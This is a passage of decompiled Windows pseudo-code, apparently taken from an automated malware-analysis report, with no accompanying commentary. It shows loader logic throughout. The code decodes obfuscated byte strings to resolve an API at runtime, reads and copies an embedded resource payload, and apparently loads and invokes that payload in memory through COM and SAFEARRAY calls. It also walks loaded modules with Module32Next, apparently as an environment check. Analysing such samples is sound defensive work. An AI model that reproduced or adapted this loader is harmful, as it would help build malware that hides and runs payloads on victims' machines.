                                                                                                                                                                                                        						if(_t350 == 0) {
                                                                                                                                                                                                        							 *(_t559 + 0x50) = 0;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							E0040BA30(_t526, _t350, 0, 0x40022);
                                                                                                                                                                                                        							_t486 =  *(_t559 + 0x40);
                                                                                                                                                                                                        							_t559 = _t559 + 0xc;
                                                                                                                                                                                                        							 *(_t559 + 0x50) = _t486;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						E00401300( *(_t559 + 0x50));
                                                                                                                                                                                                        						_t497 =  *(_t559 + 0x48);
                                                                                                                                                                                                        						_t352 = SizeofResource(_t526, _t497);
                                                                                                                                                                                                        						 *(_t559 + 0x40) = _t352;
                                                                                                                                                                                                        						asm("cdq");
                                                                                                                                                                                                        						_t354 = _t352 + (_t497 & 0x000003ff) >> 0xa;
                                                                                                                                                                                                        						__eflags = _t354;
                                                                                                                                                                                                        						if(_t354 > 0) {
                                                                                                                                                                                                        							_t519 =  *(_t559 + 0x3c);
                                                                                                                                                                                                        							_t482 = _t537 - _t519;
                                                                                                                                                                                                        							__eflags = _t482;
                                                                                                                                                                                                        							 *(_t559 + 0x34) = _t519;
                                                                                                                                                                                                        							 *(_t559 + 0x88) = _t482;
                                                                                                                                                                                                        							 *(_t559 + 0x38) = _t354;
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								_t424 =  *(_t559 + 0x34);
                                                                                                                                                                                                        								_push( *(_t559 + 0x88) + _t424);
                                                                                                                                                                                                        								_push(0x400);
                                                                                                                                                                                                        								_push(_t424);
                                                                                                                                                                                                        								E00401560(0,  *((intOrPtr*)(_t559 + 0x54)));
                                                                                                                                                                                                        								 *(_t559 + 0x34) =  *(_t559 + 0x34) + 0x400;
                                                                                                                                                                                                        								_t179 = _t559 + 0x38;
                                                                                                                                                                                                        								 *_t179 =  *(_t559 + 0x38) - 1;
                                                                                                                                                                                                        								__eflags =  *_t179;
                                                                                                                                                                                                        							} while ( *_t179 != 0);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t448 =  *(_t559 + 0x40) & 0x800003ff;
                                                                                                                                                                                                        						__eflags = _t448;
                                                                                                                                                                                                        						if(_t448 < 0) {
                                                                                                                                                                                                        							_t448 = (_t448 - 0x00000001 | 0xfffffc00) + 1;
                                                                                                                                                                                                        							__eflags = _t448;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _t448;
                                                                                                                                                                                                        						if(_t448 > 0) {
                                                                                                                                                                                                        							_t421 =  *(_t559 + 0x40) - _t448;
                                                                                                                                                                                                        							_push(_t421 + _t537);
                                                                                                                                                                                                        							_push(_t448);
                                                                                                                                                                                                        							_t422 = _t421 +  *((intOrPtr*)(_t559 + 0x44));
                                                                                                                                                                                                        							__eflags = _t422;
                                                                                                                                                                                                        							_push(_t422);
                                                                                                                                                                                                        							E00401560(0,  *((intOrPtr*)(_t559 + 0x58)));
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						E0040BA30(_t526,  *(_t559 + 0x3c), 0,  *(_t559 + 0x40));
                                                                                                                                                                                                        						_t560 = _t559 + 0xc;
                                                                                                                                                                                                        						FreeResource(_t551);
                                                                                                                                                                                                        						_t552 =  *_t537;
                                                                                                                                                                                                        						 *((intOrPtr*)(_t560 + 0x94)) = _t552;
                                                                                                                                                                                                        						_t358 = E0040B84D(0,  *(_t559 + 0x40), _t526, _t552); // executed
                                                                                                                                                                                                        						_t561 = _t560 + 4;
                                                                                                                                                                                                        						 *((intOrPtr*)(_t561 + 0x40)) = _t358;
                                                                                                                                                                                                        						_t359 = SizeofResource(_t526,  *(_t560 + 0x4c));
                                                                                                                                                                                                        						_t527 =  *((intOrPtr*)(_t561 + 0x38));
                                                                                                                                                                                                        						_t192 = _t537 + 4; // 0x4
                                                                                                                                                                                                        						E0040AC60(_t527, _t561 + 0x98, _t192, _t359);
                                                                                                                                                                                                        						E0040BA30(_t527, _t537, 0,  *((intOrPtr*)(_t561 + 0x50)));
                                                                                                                                                                                                        						_t528 = _t527 + 0xe;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x34)) = 0xce;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x35)) = 0x27;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x36)) = 0x9c;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x37)) = 0x1a;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x38)) = 0x95;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x39)) = 0x21;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x3a)) = 0x2e;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x3b)) = 0xd;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x3c)) = 0xdb;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x3d)) = 0x29;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x3e)) = 0x57;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x3f)) = 0x56;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x40)) = 0xf8;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x41)) = 0x98;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x42)) = 0x5b;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x43)) = 0xf4;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x44)) = 0xb5;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x45)) = 0x87;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x46)) = 0x7b;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x47)) = 0xf;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x48)) = 0xf4;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x49)) = 0x76;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x4a)) = 0xb9;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x4b)) = 0x34;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x4c)) = 0xbf;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x4d)) = 0x1e;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x4e)) = 0xe7;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x4f)) = 0x78;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x50)) = 0x98;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x51)) = 0xe9;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x52)) = 0x6f;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x53)) = 0xb4;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x54)) = 0;
                                                                                                                                                                                                        						_t364 = E00401650(_t561 + 0x30, _t561 + 0x110);
                                                                                                                                                                                                        						_t562 = _t561 + 0x24;
                                                                                                                                                                                                        						_t365 = LoadLibraryA(_t364); // executed
                                                                                                                                                                                                        						_t538 = _t365;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x10)) = 0xe0;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x11)) = 0x18;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x12)) = 0xad;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x13)) = 0x36;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x14)) = 0x95;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x15)) = 0x21;
                                                                                                                                                                                                        						_t451 = _t562 + 0x134;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x1e)) = 0x2a;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x1f)) = 0x57;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x20)) = 0xda;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x21)) = 0xc;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x22)) = 0x55;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x23)) = 0x25;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x24)) = 0x8c;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x25)) = 0xf9;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x26)) = 0x35;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x27)) = 0x97;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x28)) = 0xd0;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x29)) = 0x87;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x2a)) = 0x7b;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x2b)) = 0xf;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x2c)) = 0xf4;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x2d)) = 0x76;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x2e)) = 0xb9;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x2f)) = 0x34;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x30)) = 0xbf;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x31)) = 0x1e;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x32)) = 0xe7;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x33)) = 0x78;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x34)) = 0x98;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x35)) = 0xe9;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x36)) = 0x6f;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x37)) = 0xb4;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x38)) = 0;
                                                                                                                                                                                                        						_t366 = E00401650(_t562 + 0x14, _t451);
                                                                                                                                                                                                        						_t563 = _t562 + 8;
                                                                                                                                                                                                        						_t367 = GetProcAddress(_t365, _t366);
                                                                                                                                                                                                        						__eflags = _t367;
                                                                                                                                                                                                        						_t452 = _t451 & 0xffffff00 | _t367 != 0x00000000;
                                                                                                                                                                                                        						__eflags = _t452;
                                                                                                                                                                                                        						 *(_t563 + 0x47) = _t452 == 0;
                                                                                                                                                                                                        						 *0x423480 = _t367;
                                                                                                                                                                                                        						 *((intOrPtr*)(_t563 + 0x80)) = 0;
                                                                                                                                                                                                        						 *((intOrPtr*)(_t563 + 0x84)) = 0;
                                                                                                                                                                                                        						 *((intOrPtr*)(_t563 + 0x4c)) = 0;
                                                                                                                                                                                                        						 *(_t563 + 0x58) = 0;
                                                                                                                                                                                                        						 *(_t563 + 0x54) = 0;
                                                                                                                                                                                                        						__eflags = _t452;
                                                                                                                                                                                                        						if(_t452 != 0) {
                                                                                                                                                                                                        							_t368 =  *_t367(0x41b230, 0x41b220, _t563 + 0x80); // executed
                                                                                                                                                                                                        							__eflags = _t368;
                                                                                                                                                                                                        							if(_t368 >= 0) {
                                                                                                                                                                                                        								__eflags =  *(_t563 + 0x47);
                                                                                                                                                                                                        								if( *(_t563 + 0x47) == 0) {
                                                                                                                                                                                                        									 *((intOrPtr*)(_t563 + 0x17c)) = _t563 + 0x17c;
                                                                                                                                                                                                        									E004018F0( *((intOrPtr*)(_t563 + 0x38)), _t563 + 0x17c, _t563 + 0x17c,  *((intOrPtr*)(_t563 + 0x38)), 3);
                                                                                                                                                                                                        									_t376 =  *((intOrPtr*)(_t563 + 0x80));
                                                                                                                                                                                                        									_t378 =  *((intOrPtr*)( *((intOrPtr*)( *_t376 + 0xc))))(_t376,  *((intOrPtr*)(_t563 + 0x178)), 0x41b240, _t563 + 0x84); // executed
                                                                                                                                                                                                        									__eflags = _t378;
                                                                                                                                                                                                        									if(_t378 >= 0) {
                                                                                                                                                                                                        										_t381 =  *((intOrPtr*)(_t563 + 0x84));
                                                                                                                                                                                                        										_t383 =  *((intOrPtr*)( *((intOrPtr*)( *_t381 + 0x24))))(_t381, 0x41b210, 0x41b290, _t563 + 0x4c); // executed
                                                                                                                                                                                                        										__eflags = _t383;
                                                                                                                                                                                                        										if(_t383 >= 0) {
                                                                                                                                                                                                        											_t384 =  *((intOrPtr*)(_t563 + 0x4c));
                                                                                                                                                                                                        											_t385 =  *((intOrPtr*)( *((intOrPtr*)( *_t384 + 0x28))))(_t384); // executed
                                                                                                                                                                                                        											__eflags = _t385;
                                                                                                                                                                                                        											if(_t385 >= 0) {
                                                                                                                                                                                                        												 *((intOrPtr*)(_t563 + 0x38)) = 0;
                                                                                                                                                                                                        												E00401870(_t563 + 0x44, _t552, "_._");
                                                                                                                                                                                                        												_t539 = __imp__#8;
                                                                                                                                                                                                        												 *((intOrPtr*)(_t563 + 0x40)) = 0;
                                                                                                                                                                                                        												 *_t539(_t563 + 0x94);
                                                                                                                                                                                                        												E00401870(_t563 + 0x3c, _t552, "___");
                                                                                                                                                                                                        												 *_t539(_t563 + 0xa4);
                                                                                                                                                                                                        												 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t563 + 0x4c)))) + 0x34))))( *((intOrPtr*)(_t563 + 0x50)), E004018D0(_t563 + 0x58)); // executed
                                                                                                                                                                                                        												_t542 =  *(_t563 + 0x58);
                                                                                                                                                                                                        												__eflags = _t542;
                                                                                                                                                                                                        												if(_t542 == 0) {
                                                                                                                                                                                                        													E0040AD90(0x80004003);
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												_t396 =  *((intOrPtr*)( *((intOrPtr*)( *_t542))))(_t542, 0x41b270, E004018D0(_t563 + 0x54));
                                                                                                                                                                                                        												 *((intOrPtr*)(_t563 + 0x94)) = _t552 + 0xfffffff2;
                                                                                                                                                                                                        												 *((intOrPtr*)(_t563 + 0x98)) = 0;
                                                                                                                                                                                                        												__imp__#15(0x11, 1, _t563 + 0x88); // executed
                                                                                                                                                                                                        												_t543 = _t396;
                                                                                                                                                                                                        												 *((intOrPtr*)(_t563 + 0x50)) = 0;
                                                                                                                                                                                                        												__imp__#23(_t543, _t563 + 0x48);
                                                                                                                                                                                                        												E0040B350(0, _t528, _t543,  *((intOrPtr*)(_t563 + 0x48)), _t528, _t552 + 0xfffffff2);
                                                                                                                                                                                                        												_t564 = _t563 + 0xc;
                                                                                                                                                                                                        												__imp__#24(_t543);
                                                                                                                                                                                                        												_t399 =  *(_t564 + 0x54);
                                                                                                                                                                                                        												__eflags = _t399;
                                                                                                                                                                                                        												if(_t399 == 0) {
                                                                                                                                                                                                        													_t399 = E0040AD90(0x80004003);
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												 *((intOrPtr*)( *((intOrPtr*)( *_t399 + 0xb4))))(_t399, _t543, E004018D0(_t564 + 0x34)); // executed
                                                                                                                                                                                                        												__eflags = _t543;
                                                                                                                                                                                                        												if(_t543 != 0) {
                                                                                                                                                                                                        													__imp__#16(_t543);
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												_t402 =  *(_t564 + 0x34);
                                                                                                                                                                                                        												__eflags = _t402;
                                                                                                                                                                                                        												if(_t402 == 0) {
                                                                                                                                                                                                        													_t402 = E0040AD90(0x80004003);
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												_t469 =  *(_t564 + 0x40);
                                                                                                                                                                                                        												_t555 = _t402;
                                                                                                                                                                                                        												__eflags = _t469;
                                                                                                                                                                                                        												if(_t469 == 0) {
                                                                                                                                                                                                        													_t531 = 0;
                                                                                                                                                                                                        													__eflags = 0;
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													_t531 =  *_t469;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												 *((intOrPtr*)( *((intOrPtr*)( *_t402 + 0x44))))(_t555, _t531, E004018D0(_t564 + 0x3c)); // executed
                                                                                                                                                                                                        												__imp__#411(0xc, 0, 0);
                                                                                                                                                                                                        												_t471 =  *(_t564 + 0x3c);
                                                                                                                                                                                                        												__eflags = _t471;
                                                                                                                                                                                                        												if(_t471 == 0) {
                                                                                                                                                                                                        													E0040AD90(0x80004003);
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												_t405 =  *(_t564 + 0x38);
                                                                                                                                                                                                        												__eflags = _t405;
                                                                                                                                                                                                        												if(_t405 == 0) {
                                                                                                                                                                                                        													_t514 = 0;
                                                                                                                                                                                                        													__eflags = 0;
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													_t514 =  *_t405;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												_t563 = _t564 - 0x10;
                                                                                                                                                                                                        												_t407 = _t563;
                                                                                                                                                                                                        												 *_t407 =  *((intOrPtr*)(_t564 + 0x94));
                                                                                                                                                                                                        												 *((intOrPtr*)(_t407 + 4)) =  *((intOrPtr*)(_t563 + 0xb0));
                                                                                                                                                                                                        												 *((intOrPtr*)(_t407 + 8)) =  *((intOrPtr*)(_t563 + 0xb8));
                                                                                                                                                                                                        												_t528 =  *((intOrPtr*)(_t563 + 0xc0));
                                                                                                                                                                                                        												 *((intOrPtr*)(_t407 + 0xc)) =  *((intOrPtr*)(_t563 + 0xc0));
                                                                                                                                                                                                        												 *((intOrPtr*)( *((intOrPtr*)( *_t471 + 0xe4))))(_t471, _t514, 0x118, 0, 0, _t564 + 0xa4);
                                                                                                                                                                                                        												_t538 = __imp__#9; // 0x777dcf00
                                                                                                                                                                                                        												_t538->i(_t563 + 0xa4);
                                                                                                                                                                                                        												E004019A0(_t563 + 0x38);
                                                                                                                                                                                                        												_t538->i(_t563 + 0x94);
                                                                                                                                                                                                        												_t413 =  *(_t563 + 0x3c);
                                                                                                                                                                                                        												__eflags = _t413;
                                                                                                                                                                                                        												if(_t413 != 0) {
                                                                                                                                                                                                        													 *((intOrPtr*)( *((intOrPtr*)( *_t413 + 8))))(_t413);
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												E004019A0(_t563 + 0x40);
                                                                                                                                                                                                        												_t415 =  *(_t563 + 0x34);
                                                                                                                                                                                                        												__eflags = _t415;
                                                                                                                                                                                                        												if(_t415 != 0) {
                                                                                                                                                                                                        													 *((intOrPtr*)( *((intOrPtr*)( *_t415 + 8))))(_t415);
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t379 =  *((intOrPtr*)(_t563 + 0x174));
                                                                                                                                                                                                        									__eflags = _t379 - _t563 + 0x178;
                                                                                                                                                                                                        									if(__eflags != 0) {
                                                                                                                                                                                                        										_push(_t379);
                                                                                                                                                                                                        										E0040B6B5(0, _t528, _t538, __eflags);
                                                                                                                                                                                                        										_t563 = _t563 + 4;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t369 =  *(_t563 + 0x54);
                                                                                                                                                                                                        							__eflags = _t369;
                                                                                                                                                                                                        							if(_t369 != 0) {
                                                                                                                                                                                                        								 *((intOrPtr*)( *((intOrPtr*)( *_t369 + 8))))(_t369);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t370 =  *(_t563 + 0x58);
                                                                                                                                                                                                        							__eflags = _t370;
                                                                                                                                                                                                        							if(_t370 != 0) {
                                                                                                                                                                                                        								 *((intOrPtr*)( *((intOrPtr*)( *_t370 + 8))))(_t370);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L80;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t428 = E00401650(_t557 + 0x60, _t557 + 0xd4);
                                                                                                                                                                                                        						_t565 = _t557 + 8;
                                                                                                                                                                                                        						_t547 = _t428;
                                                                                                                                                                                                        						_t520 = _t565 + 0x298;
                                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                                        							_t429 =  *_t520;
                                                                                                                                                                                                        							if(_t429 !=  *_t547) {
                                                                                                                                                                                                        								break;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							if(_t429 == 0) {
                                                                                                                                                                                                        								L7:
                                                                                                                                                                                                        								_t429 = 0;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t493 =  *((intOrPtr*)(_t520 + 1));
                                                                                                                                                                                                        								if(_t493 !=  *((intOrPtr*)(_t547 + 1))) {
                                                                                                                                                                                                        									break;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t520 = _t520 + 2;
                                                                                                                                                                                                        									_t547 = _t547 + 2;
                                                                                                                                                                                                        									if(_t493 != 0) {
                                                                                                                                                                                                        										continue;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										goto L7;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							L9:
                                                                                                                                                                                                        							if(_t429 != 0) {
                                                                                                                                                                                                        								_t431 = E00401650(_t565 + 0x14, _t565 + 0xb4);
                                                                                                                                                                                                        								_t557 = _t565 + 8;
                                                                                                                                                                                                        								_t548 = _t431;
                                                                                                                                                                                                        								_t488 = _t557 + 0x298;
                                                                                                                                                                                                        								while(1) {
                                                                                                                                                                                                        									_t432 =  *_t488;
                                                                                                                                                                                                        									__eflags = _t432 -  *_t548;
                                                                                                                                                                                                        									if(_t432 !=  *_t548) {
                                                                                                                                                                                                        										break;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									__eflags = _t432;
                                                                                                                                                                                                        									if(_t432 == 0) {
                                                                                                                                                                                                        										L16:
                                                                                                                                                                                                        										_t432 = 0;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t432 =  *((intOrPtr*)(_t488 + 1));
                                                                                                                                                                                                        										__eflags = _t432 -  *((intOrPtr*)(_t548 + 1));
                                                                                                                                                                                                        										if(_t432 !=  *((intOrPtr*)(_t548 + 1))) {
                                                                                                                                                                                                        											break;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t488 = _t488 + 2;
                                                                                                                                                                                                        											_t548 = _t548 + 2;
                                                                                                                                                                                                        											__eflags = _t432;
                                                                                                                                                                                                        											if(_t432 != 0) {
                                                                                                                                                                                                        												continue;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												goto L16;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									L18:
                                                                                                                                                                                                        									__eflags = _t432;
                                                                                                                                                                                                        									if(_t432 == 0) {
                                                                                                                                                                                                        										goto L10;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t435 = Module32Next(_t525, _t557 + 0x278);
                                                                                                                                                                                                        										__eflags = _t435;
                                                                                                                                                                                                        										if(_t435 != 0) {
                                                                                                                                                                                                        											do {
                                                                                                                                                                                                        												_t437 = E00401650(_t557 + 0x60, _t557 + 0xd4);
                                                                                                                                                                                                        												_t566 = _t557 + 8;
                                                                                                                                                                                                        												_t549 = _t437;
                                                                                                                                                                                                        												_t490 = _t566 + 0x298;
                                                                                                                                                                                                        												while(1) {
                                                                                                                                                                                                        													_t438 =  *_t490;
                                                                                                                                                                                                        													__eflags = _t438 -  *_t549;
                                                                                                                                                                                                        													if(_t438 !=  *_t549) {
                                                                                                                                                                                                        														break;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        													__eflags = _t438;
                                                                                                                                                                                                        													if(_t438 == 0) {
                                                                                                                                                                                                        														L26:
                                                                                                                                                                                                        														_t438 = 0;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														_t438 =  *((intOrPtr*)(_t490 + 1));
                                                                                                                                                                                                        														__eflags = _t438 -  *((intOrPtr*)(_t549 + 1));
                                                                                                                                                                                                        														if(_t438 !=  *((intOrPtr*)(_t549 + 1))) {
                                                                                                                                                                                                        															break;
                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                        															_t490 = _t490 + 2;
                                                                                                                                                                                                        															_t549 = _t549 + 2;
                                                                                                                                                                                                        															__eflags = _t438;
                                                                                                                                                                                                        															if(_t438 != 0) {
                                                                                                                                                                                                        																continue;
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																goto L26;
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        													L28:
                                                                                                                                                                                                        													__eflags = _t438;
                                                                                                                                                                                                        													if(_t438 == 0) {
                                                                                                                                                                                                        														goto L10;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														_t439 = E00401650(_t566 + 0x14, _t566 + 0xb4);
                                                                                                                                                                                                        														_t557 = _t566 + 8;
                                                                                                                                                                                                        														_t550 = _t439;
                                                                                                                                                                                                        														_t492 = _t557 + 0x298;
                                                                                                                                                                                                        														while(1) {
                                                                                                                                                                                                        															_t440 =  *_t492;
                                                                                                                                                                                                        															__eflags = _t440 -  *_t550;
                                                                                                                                                                                                        															if(_t440 !=  *_t550) {
                                                                                                                                                                                                        																break;
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        															__eflags = _t440;
                                                                                                                                                                                                        															if(_t440 == 0) {
                                                                                                                                                                                                        																L34:
                                                                                                                                                                                                        																_t440 = 0;
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																_t440 =  *((intOrPtr*)(_t492 + 1));
                                                                                                                                                                                                        																__eflags = _t440 -  *((intOrPtr*)(_t550 + 1));
                                                                                                                                                                                                        																if(_t440 !=  *((intOrPtr*)(_t550 + 1))) {
                                                                                                                                                                                                        																	break;
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	_t492 = _t492 + 2;
                                                                                                                                                                                                        																	_t550 = _t550 + 2;
                                                                                                                                                                                                        																	__eflags = _t440;
                                                                                                                                                                                                        																	if(_t440 != 0) {
                                                                                                                                                                                                        																		continue;
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		goto L34;
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        															L36:
                                                                                                                                                                                                        															__eflags = _t440;
                                                                                                                                                                                                        															if(_t440 == 0) {
                                                                                                                                                                                                        																goto L10;
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																goto L37;
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        															goto L81;
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        														asm("sbb eax, eax");
                                                                                                                                                                                                        														asm("sbb eax, 0xffffffff");
                                                                                                                                                                                                        														goto L36;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        													goto L81;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												asm("sbb eax, eax");
                                                                                                                                                                                                        												asm("sbb eax, 0xffffffff");
                                                                                                                                                                                                        												goto L28;
                                                                                                                                                                                                        												L37:
                                                                                                                                                                                                        												_t442 = Module32Next(_t525, _t557 + 0x278);
                                                                                                                                                                                                        												__eflags = _t442;
                                                                                                                                                                                                        											} while (_t442 != 0);
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										goto L38;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									goto L81;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								asm("sbb eax, eax");
                                                                                                                                                                                                        								asm("sbb eax, 0xffffffff");
                                                                                                                                                                                                        								goto L18;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								L10:
                                                                                                                                                                                                        								CloseHandle(_t525);
                                                                                                                                                                                                        								return 0;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							goto L81;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						asm("sbb eax, eax");
                                                                                                                                                                                                        						asm("sbb eax, 0xffffffff");
                                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				L81:
                                                                                                                                                                                                        			}
                                                                                                                                                                                                        0x00401e6e
                                                                                                                                                                                                        0x00401e73
                                                                                                                                                                                                        0x00401e78
                                                                                                                                                                                                        0x00401e7d
                                                                                                                                                                                                        0x00401e82
                                                                                                                                                                                                        0x00401e86
                                                                                                                                                                                                        0x00401e8b
                                                                                                                                                                                                        0x00401e96
                                                                                                                                                                                                        0x00401e9a
                                                                                                                                                                                                        0x00401ea4
                                                                                                                                                                                                        0x00401eaf
                                                                                                                                                                                                        0x00401eba
                                                                                                                                                                                                        0x00401ebf
                                                                                                                                                                                                        0x00401ec4
                                                                                                                                                                                                        0x00401ec6
                                                                                                                                                                                                        0x00401ecb
                                                                                                                                                                                                        0x00401ece
                                                                                                                                                                                                        0x00401ed2
                                                                                                                                                                                                        0x00401ed4
                                                                                                                                                                                                        0x00401eef
                                                                                                                                                                                                        0x00401ed6
                                                                                                                                                                                                        0x00401edd
                                                                                                                                                                                                        0x00401ee2
                                                                                                                                                                                                        0x00401ee6
                                                                                                                                                                                                        0x00401ee9
                                                                                                                                                                                                        0x00401ee9
                                                                                                                                                                                                        0x00401ef7
                                                                                                                                                                                                        0x00401efc
                                                                                                                                                                                                        0x00401f02
                                                                                                                                                                                                        0x00401f08
                                                                                                                                                                                                        0x00401f0c
                                                                                                                                                                                                        0x00401f15
                                                                                                                                                                                                        0x00401f18
                                                                                                                                                                                                        0x00401f1a
                                                                                                                                                                                                        0x00401f1c
                                                                                                                                                                                                        0x00401f22
                                                                                                                                                                                                        0x00401f22
                                                                                                                                                                                                        0x00401f24
                                                                                                                                                                                                        0x00401f28
                                                                                                                                                                                                        0x00401f2f
                                                                                                                                                                                                        0x00401f33
                                                                                                                                                                                                        0x00401f33
                                                                                                                                                                                                        0x00401f40
                                                                                                                                                                                                        0x00401f45
                                                                                                                                                                                                        0x00401f4a
                                                                                                                                                                                                        0x00401f4b
                                                                                                                                                                                                        0x00401f50
                                                                                                                                                                                                        0x00401f58
                                                                                                                                                                                                        0x00401f58
                                                                                                                                                                                                        0x00401f58
                                                                                                                                                                                                        0x00401f58
                                                                                                                                                                                                        0x00401f33
